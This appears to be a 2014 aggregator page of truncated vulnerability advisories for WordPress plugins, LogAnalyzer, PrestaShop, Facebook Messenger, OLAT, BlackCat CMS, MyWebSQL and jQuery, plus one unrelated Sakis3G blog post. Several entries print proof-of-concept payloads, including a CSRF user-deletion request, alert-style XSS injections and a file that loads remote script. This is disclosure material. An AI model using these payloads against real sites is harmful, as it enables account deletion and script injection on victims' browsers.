WordPress Plugin Vulnerability Dump – Part 2

10 September 2014 - Source: http://www.mondounix.com
More vulnerabilities in poorly coded plugins for y'all.
 
Ninja Forms v2.77 - Authorization bypass (regular users can delete forms, etc)
Contact Form v3.83 - Email header injection
WP to Twitter v2.9.3 - Authorization bypass (regular users can tweet to the admin's twitter account)
Xhanch - My Twitter v2.7.7 - CSRF (create and delete tweets)
TinyMCE Advanced v4.1 - (insignificant) CSRF
W3 Total Cache v0.9.4 - (minor) CSRF
WordPress Download Manager v2.6.92 - Authorization bypass (regular users can upload/delete arbitrary files, yes, even php files)
Wordfence Security v5.2.2 - Stored XSS
 
Details and POCs located: https://vexatioustendencies.com/wordpress-plugin-vulnerability-dump-part-2/
 
More to follow.
 
-Voxel...

Read more »

WordPress Bulk Delete Users By Email 1.0 CSRF

9 September 2014 - Source: http://www.mondounix.com
# Exploit Title: Bulk Delete Users by Email, Wordpress Plugin 1.0 - CSRF
# Google Dork: N/A
# Date: 05.09.2014
# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
# Vendor Homepage - http://www.speakdigital.co.uk/
# Software Link: https://wordpress.org/plugins/bulk-delete-users-by-email/
# Version: 1.0
# Tested on: PHP
 
 
Description:
This plugin will allow an administrator to delete user account(s) by entering
their email address.
 
Proof of Concept
1. Force the administrator to send below request:
 
URL :
http://localhost/blog/wp-admin/admin.php?page=bulk-delete-users-by-email/plugin.php
METHOD : POST
REQUEST : de-text=<victim email>&submit=Search+and+Delete
 
* As the result,...

Read more »

Sakis3G, simple 3G without NetworkManager

7 September 2014 - Source: http://www.osside.net

Coming home after a juicy mega update, I discovered that Debian testing's NetworkManager no longer connected me over 3G, neither with the Huawei dongle nor with the Onda one: LED blinking steadily on both computers.

After checking whether there was actually credit available, I discovered Sakis3G, a really simple and effective little program that connects my dongle with a stability I had never seen before; NetworkManager in fact often gave me problems, particularly on the second reconnection.

In...

Read more »

LogAnalyzer 3.6.5 Cross Site Scripting

7 September 2014 - Source: http://www.mondounix.com
Author: Dolev Farhi @dolevff
Application: LogAnalyzer
Date: 8.2.2014
Tested on: Red Hat Enterprise Linux 6.4
Relevant CVEs: CVE-2014-6070
 
 
1. About the application
------------------------
LogAnalyzer is a web interface to syslog and other network event data. 
It provides easy browsing, analysis of realtime network events and 
reporting services.
 
 
2. Vulnerabilities Descriptions:
-----------------------------
It was found that an XSS injection is possible on a syslog server 
running LogAnalyzer version 3.6.5.
By changing the hostname of any entity logging to syslog server with 
LogAnalyzer to <script>alert("xss")</script>, and sending an arbitrary
syslog message, a client-side script...

Read more »

Mpay24 prestashop payment module multiple vulnerabilities

7 September 2014 - Source: http://www.mondounix.com
 Mpay24 PrestaShop Payment Module Multiple Vulnerabilities
 
- Affected Vendor: Mpay24
- Affected Software: Mpay24 Payment Module
- Affected Version: 1.5 and earlier
- Issue Type: SQL injection and information disclosure
- Notification Date: 10 February 2014
- Release Date: 03 September 2014
- Discovered by: Eldar Marcussen
- Issue status: Patch available
 
Summary
 
BAE Systems Applied Intelligence researcher, Eldar Marcussen has identified
two high impact vulnerabilities in the Mpay24 payment module for the
Prestashop e-commerce solution.
 
“Mpay24 is the online-payment platform for e- and m-commerce...

Read more »

Facebook Messenger / App MIME Sniffing Cross Site Scripting

7 September 2014 - Source: http://www.mondounix.com
I. VULNERABILITY
-------------------------
Reflected XSS vulnerabilities using MIME Sniffing in Facebook
Messenger and Facebook App for iOS.
 
II. BACKGROUND
-------------------------
Facebook is a social network.
 
III. DESCRIPTION
-------------------------
A Reflected XSS vulnerability by MIME Sniffing has been detected.
The code injection is done through chat using send file.
 
IV. PROOF OF CONCEPT
-------------------------
The application does not validate the content of the file sent, only
its extension.
Content of file face.jjjj:
<script src="https://www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1">
</script>
Content of file face.js:
alert("Alert XSS Chat send File Facebook...

Read more »

Olat Stored Cross Site Scripting

7 September 2014 - Source: http://www.mondounix.com
# Affected software: //demo.olat.org/
# Discovered by: Provensec
# Website: http://www.provensec.com
# Type of vulnerability: Stored XSS
# Author: Ankit Bharathan, Provensec labs
# Description: Go to personal folder, open any folder and create a new
document xss.tct
and then edit it fill field with "><img src=d
onerror=confirm(/provensec/);>
 
Then open folder and in new tab
example:
 
http://demo.olat.org/olat/auth/1%3A2%3A1001302707%3A6%3A0%3Aserv%3Ax/public/dddd.tct.html

(5)

...

Read more »

BlackCat CMS Reflected Cross-Site Scripting (XSS)

6 September 2014 - Source: http://www.mondounix.com
Advisory ID: HTB23228
Product: BlackCat CMS
Vendor: Black Cat Development
Vulnerable Version(s): 1.0.3 and probably prior
Tested Version: 1.0.3
Advisory Publication:  August 13, 2014  [without technical details]
Vendor Notification: August 13, 2014 
Vendor Patch: August 13, 2014 
Public Disclosure: September 3, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-5259
Risk Level: Medium 
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech...

Read more »

MyWebSQL 3.4 Cross Site Scripting

6 September 2014 - Source: http://www.mondounix.com
Advisory ID: HTB23221
Product: MyWebSQL
Vendor: http://mywebsql.net/
Vulnerable Version(s): 3.4 and probably prior
Tested Version: 3.4
Advisory Publication:  June 25, 2014  [without technical details]
Vendor Notification: June 25, 2014 
Public Disclosure: September 3, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-4735
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab...

Read more »

JQuery 1.4.2 Cross Site Scripting

3 September 2014 - Source: http://www.mondounix.com
XSS Reflected JQuery 1.4.2 - Create object option in runtime client-side
From: Mauro Risonho de Paula Assumpção
Date: 02.09.2014 13:21:20 -0300
 
VSLA Security Advisory FIRE-XSS-Reflected-Jquery 1.4.2 2014-001:
XSS Reflected JQuery 1.4.2
 
LEVEL: MEDIUM
In our tests authorized by the customer, we can stop the entire plant.
 
Published: 09/01/2014
Version: 1.0
 
Vendor: Jquery (https://jquery.org/)
Product: Jquery 1.4.2 (http://blog.jquery.com/2010/02/19/jquery-142-released/)
Version affected: 1.4.2
 
Product description:
Jquery is an open source software.
jQuery is a cross-platform JavaScript library designed to simplify the
client-side scripting of HTML(1).
 
Credit: Mauro Risonho de Paula Assumpção...

Read more »